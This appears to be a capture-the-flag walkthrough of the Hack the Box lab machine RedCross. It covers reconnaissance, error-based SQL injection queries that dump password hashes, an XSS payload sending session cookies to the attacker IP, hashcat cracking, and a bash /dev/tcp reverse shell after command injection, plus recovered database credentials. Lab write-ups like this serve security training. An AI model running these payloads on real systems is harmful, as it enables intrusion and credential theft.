Skip to content

Latest commit

 

History

History
283 lines (237 loc) · 15.7 KB

redcross.md

File metadata and controls

283 lines (237 loc) · 15.7 KB
Raw

Hack the Box - RedCross

Machine IP: 10.10.10.113 - Debian

Reconnaisance

Disover all open TCP ports

nmap -Pn -sS -p- 10.10.10.113 -T4 --min-rate 1000 -oN nmap.surface

Identify and scan running services on open ports

sudo nmap -sV -sC -p 22,80,443 10.10.10.113 -oN nmap.deep

Application Mapping

image

Directory Brute-Force

gobuster dir --url https://intra.redcross.htb --wordlist /usr/share/wordlists/directories.txt --no-tls-validation --threads 25 --output intra-dir.out

image

Recursive Directory Brute-Force

gobuster dir --url https://intra.redcross.htb/pages --wordlist Common-PHP-Filenames.txt --no-tls-validation --threads 25 --output intra-dir-pages.out

image

Recursive Directory Brute-Force

gobuster dir --url https://intra.redcross.htb/documentation --wordlist directory-list-2.3-small.txt --no-tls-validation  --threads 25 --output intra-dir-pages.out --extensions pdf,txt

image

Virtual Host Brute-Force

wfuzz -H 'Host: FUZZ.redcross.htb' -u 'https://10.10.10.113' -w subdomains-top1million-5000.txt --hw 28

image

Testing for SQL Injection

  • URL: https://intra.redcross.htb/?page=login
  • Capture the request in BurpSuite and copy it to a text file using Copy to file.
  • Run sqlmap with the captured request. image image

SQLMap

sqlmap -r login-request.txt --force-ssl --dbms mysql --batch

Nothing Found

Testing for Default Credentials on Login Page

  • Logged in as Guest.
  • Working credentials: guest:guest. image

Testing for SQL Injection

  • URL: https://intra.redcross.htb/?page=app
  • Capture the request in BurpSuite and copy it to a text file using Copy to file.
  • Run sqlmap with the captured request. image

SQLMap

sqlmap -r userid-filter-request.txt -p o --force-ssl --dbms mysql --batch

Manual Testing

  • Inject a ' after the o parameter in the query. image
  • Extract: Version information.
  • Query: ') and extractvalue(0x0a,concat(0x0a,version()))-- - image

Database Name

  • Extract: Database name.
  • Query: ') and extractvalue(0x0a,concat(0x0a,(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1)))-- - image

Tables

  • Extract: Table names in the database redcross.
  • Query (Table 1): ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA like "redcross" LIMIT 0,1)))-- - image
  • Query (Table 2): ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA like "redcross" LIMIT 1,1)))-- - image
  • Query (Table 3): ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA like "redcross" LIMIT 2,1)))-- - image
  • Tables Found: messages, requests and users.

Columns

  • Extract: Column names in the table users.
  • Query (Column 1): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 0,1)))-- -. image
  • Query (Column 2): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 1,1)))-- -. image
  • Query (Column 3): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 2,1)))-- -. image
  • Query (Column 4): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 3,1)))-- -. image
  • Query (Column 5): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 5,1)))-- -. image
  • Columns Found: id, username, password, mail and role.

Usernames and Passwords

  • Extract: Usernames.
  • Query (User 1): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 0,1)))-- -. image
  • Query (User 2): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 1,1)))-- -. image
  • Query (User 3): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 1,1)))-- -. image
  • Query (User 4): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 1,1)))-- -. image
  • Users Found:

    • Extract: Passwords.

    • Query: ') and extractvalue(0x0a,concat(0x0a,(select password from redcross.users LIMIT 0,1)))-- -. image

    • The above query returned the password for user admin however the passqord is not complete. The SQL query needs to be modified and then the password will be returned in two parts using two different queries.

    • Query1 : (User:admin - Password) - ') and extractvalue(0x0a,concat(0x0a,(select password from redcross.users LIMIT 0,1)))-- - image

    • Query2 : (User:admin - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 0,1) FROM 30)))-- - image

    • Combining Both: $2y$10$z/d5GiwZuFqjY1jRiKIPzuPX + Kt0SthLOyU438ajqRBtrb7ZADpwq. = $2y$10$z/d5GiwZuFqjY1jRiKIPzuKt0SthLOyU438ajqRBtrb7ZADpwq.

    • Creds: $2y$10$z/d5GiwZuFqjY1jRiKIPzuKt0SthLOyU438ajqRBtrb7ZADpwq.

    • Query3 : (User:penelope - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 1,1) FROM 1)))-- - image

    • Query4 : (User:penelope - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 1,1) FROM 32)))-- - image

    • Combining Both: $2y$10$tY9Y955kyFB37GnW4xrC0.J. + FzmkrQhxD..vKCQICvwOEgwfxqgAS = $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS

    • Creds: $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS

    • Query5 : (User:charles - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 2,1) FROM 1)))-- - image

    • Query6 : (User:charles - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 2,1) FROM 32)))-- - image

    • Creds: $2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i

    • Query5 : (User:tricia - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 3,1) FROM 1)))-- - image

    • Query5 : (User:tricia - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 3,1) FROM 32)))-- - image

    • Creds: $2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r.

    • Query5 : (User:guest - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 4,1) FROM 1)))-- - image

    • Query5 : (User:guest - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 4,1) FROM 32)))-- - image

    • Creds: $2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi

Crack Hashes

hashcat -m 3200 --username hashes.txt /usr/share/wordlists/rockyou.txt

  • hashes.txt image

  • cracked password: cookiemonster for user charles.

Application Testing

  • Directory brute-force revealed that this file is accessible: https://intra.redcross.htb/documentation/account-signup.pdf image
  • Found link: https://intra.redcross.htb/?page=contact image
  • Fill (added another parameter password)and Submit the form. image image
  • Adding the parameter password returned the credentials guest:guest.

Testing for XSS

  • Tring to fetch a session-cookie.
  • Testing all fields in the form.
  • Payload - <script>document.write('<img src="http://10.10.14.34/nothing.gif?cookie' + document.cookie + '"/>)</script>"'. image image
  • Session-Cookie: 9cvn6v8fh74bv8h6bql20dlt27 and Domain is admin.

Vhost Application

image

  • Replace the session-cookie.
  • Access to Admin Panel. image
  • Add User image image
  • Creds: random:UxNCeFVf
  • SSH: Login allowed using the credentials. However, no information of interest was found. image
  • Network Firewall: Whitelisted attacker IP.

NMAP (After Whitelisting IP)

nmap -sC -sV 10.10.10.113 -oN nmap.whitelist

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 01:54 IST                                        [0/1]
Nmap scan report for redcross.htb (10.10.10.113)
Host is up (0.089s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.8 or later
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey: 
|   2048 67d385f8eeb8062359d7758ea237d0a6 (RSA)
|   256 89b465271f93721abce3227090db3596 (ECDSA)
|_  256 66bda11c327432e2e664e8a5251b4d67 (ED25519)
80/tcp   open  http        Apache httpd 2.4.25
|_http-title: Did not follow redirect to https://intra.redcross.htb/
|_http-server-header: Apache/2.4.25 (Debian)
443/tcp  open  ssl/http    Apache httpd 2.4.25
|_http-title: Did not follow redirect to https://intra.redcross.htb/
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after:  2021-02-27T19:46:58
|_http-server-header: Apache/2.4.25 (Debian)
1025/tcp open  NFS-or-IIS?
5432/tcp open  postgresql  PostgreSQL DB 9.6.7 - 9.6.12
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=redcross.redcross.htb
| Subject Alternative Name: DNS:redcross.redcross.htb
| Not valid before: 2018-06-03T19:13:20
|_Not valid after:  2028-05-31T19:13:20
Service Info: Host: RedCross; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.51 seconds

Command Injection

image

Injection

  • Start tcpdump.
tcpdump -i tun0 icmp

image

  • ICMP echo request received from target machine. image

Reverse Shell

Reverse Shell Payload: bash -c 'bash -i >& /dev/tcp/10.10.14.34/9001 0>&1' image image

Information Gathering

image

  • DB User: unixusrmgr:dheu%7wjx8B&

image

  • DB User: dbcross:LOSPxnme4f5pH5wp